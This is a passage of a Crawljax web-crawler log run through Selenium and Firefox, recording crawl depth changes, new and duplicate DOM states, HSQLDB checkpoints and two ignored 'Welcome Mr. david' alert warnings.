[pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state398 added to the StateMachine. 2541445 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2541455 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2543711 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2544861 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2546006 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2547420 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state399 added to the StateMachine. 2547420 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2547430 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2549697 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2550846 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2551993 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2553245 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state400 added to the StateMachine. 2553245 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2553254 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2555510 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2556681 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2557828 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2559018 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state401 and state380 are the same. 2559022 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2561304 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2562489 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2563644 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2564837 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state402 added to the StateMachine. 2564837 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2564845 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2567084 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2568240 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2569391 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2570588 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state403 added to the StateMachine. 2570588 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2570596 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2572883 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2574030 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2575202 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2576539 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state404 added to the StateMachine. 2576539 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2576688 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2579029 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2580192 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2581376 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2582603 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state405 and state37 are the same. 2582606 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2584880 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2586053 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2587256 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2588520 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state406 added to the StateMachine. 2588520 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2588534 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2590750 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2591919 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2593082 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2594282 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state407 added to the StateMachine. 2594282 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2594292 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2596523 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2597744 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2599035 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2600544 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state408 added to the StateMachine. 2600544 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2600554 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2602782 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2603996 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2605310 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2606857 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state409 and state130 are the same. 2606860 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2609093 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2610238 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2611544 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2613202 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state410 added to the StateMachine. 2613203 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2613211 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2615428 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2616780 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2618083 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2619600 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state411 and state14 are the same. 2619604 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2621873 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2623038 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2624316 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2625817 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state412 added to the StateMachine. 2625817 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2625826 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2628041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2629385 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2630684 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2632193 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state413 and state14 are the same. 2632196 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2633557 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 2633557 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 2633563 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 2633806 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 2633808 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 2634492 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2635669 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2636949 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2638446 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state414 and state14 are the same. 2638450 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2640675 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2641990 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2643176 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2644422 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state415 added to the StateMachine. 2644423 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2644431 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2646666 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2648032 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2649215 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2650434 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state416 added to the StateMachine. 2650434 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2650443 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2652668 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2653850 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2655027 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2656234 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state417 added to the StateMachine. 2656234 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2656242 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2658476 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2659620 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2660798 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2662018 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state418 added to the StateMachine. 2662018 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2662027 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2664264 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2665405 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2666553 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2667770 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state419 and state402 are the same. 2667773 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2670013 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2671154 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2672304 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2673591 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state420 added to the StateMachine. 2673591 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2673600 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2675856 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2677000 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2678147 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2679358 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state421 added to the StateMachine. 2679359 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2679368 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2681627 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2682769 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2683917 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2685136 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Welcome Mr. david): Welcome Mr. david Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 2685261 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state422 added to the StateMachine. 2685261 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2685406 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 2687661 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2688805 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2689959 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2691168 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state423 and state37 are the same. 2691171 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 16 states with unfired actions 2693487 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2694664 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2696263 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2697511 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state424 added to the StateMachine. 2697511 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2697521 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 16 states with unfired actions 2699933 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2701121 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2702285 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2703488 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state425 added to the StateMachine. 2703488 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2703498 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 15 states with unfired actions 2705781 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2706961 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2708241 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2709710 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state426 added to the StateMachine. 2709710 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2709719 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 15 states with unfired actions 2712045 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2713222 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2714511 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2715978 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state427 added to the StateMachine. 2715979 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2715987 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 15 states with unfired actions 2718305 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2719485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2720764 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2722243 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state428 and state14 are the same. 2722247 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 15 states with unfired actions 2724513 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2725684 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2726967 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2728517 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state429 and state99 are the same. 2728520 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 15 states with unfired actions 2730796 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2732011 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2733293 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2734774 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state430 and state14 are the same. 2734777 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2737130 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2738307 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2739590 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2741108 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state431 and state26 are the same. 2741111 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2743533 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2744710 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2745861 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2747050 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state432 added to the StateMachine. 2747050 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2747059 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2749306 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2750496 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2751645 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2752837 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state433 added to the StateMachine. 2752838 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2752846 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2755098 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2756249 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2757399 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2758599 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state434 added to the StateMachine. 2758599 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2758608 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2760924 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2762076 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2763267 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2764460 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state435 added to the StateMachine. 2764460 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2764469 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2766710 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2767886 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2769066 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2770258 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state436 and state420 are the same. 2770262 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2772481 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2773654 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2775372 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2776562 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state437 added to the StateMachine. 2776563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2776571 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2778795 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2779969 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2781132 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2782327 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state438 added to the StateMachine. 2782327 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2782336 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2784557 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2785780 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2786955 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2788205 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Welcome Mr. david): Welcome Mr. david Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 2788295 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state439 added to the StateMachine. 2788295 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2788454 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2790695 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2791896 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2793100 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2794355 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state440 added to the StateMachine. 2794355 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2794365 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2796601 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2797756 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2799079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2800610 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state441 added to the StateMachine. 2800610 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2800619 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2802851 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2803997 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2805305 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2806892 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state442 and state130 are the same. 2806895 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2809117 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2810266 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2811576 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2813088 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state443 added to the StateMachine. 2813088 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2813096 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 2815312 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2816462 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2817763 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2819248 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state444 and state14 are the same. 2819251 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2821474 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2822685 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2823982 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2825470 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state445 and state102 are the same. 2825473 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2827708 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2828918 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2830113 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2831344 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state446 added to the StateMachine. 2831344 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2831352 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2833595 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2834753 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2835983 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2837231 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state447 added to the StateMachine. 2837231 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2837240 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2839490 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2840668 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2841836 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2843054 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state448 added to the StateMachine. 2843054 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2843063 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2845288 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2846434 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2847619 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2848847 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state449 added to the StateMachine. 2848847 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2848855 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2851116 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2852261 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2853427 [pool-2-thread-2] INFO 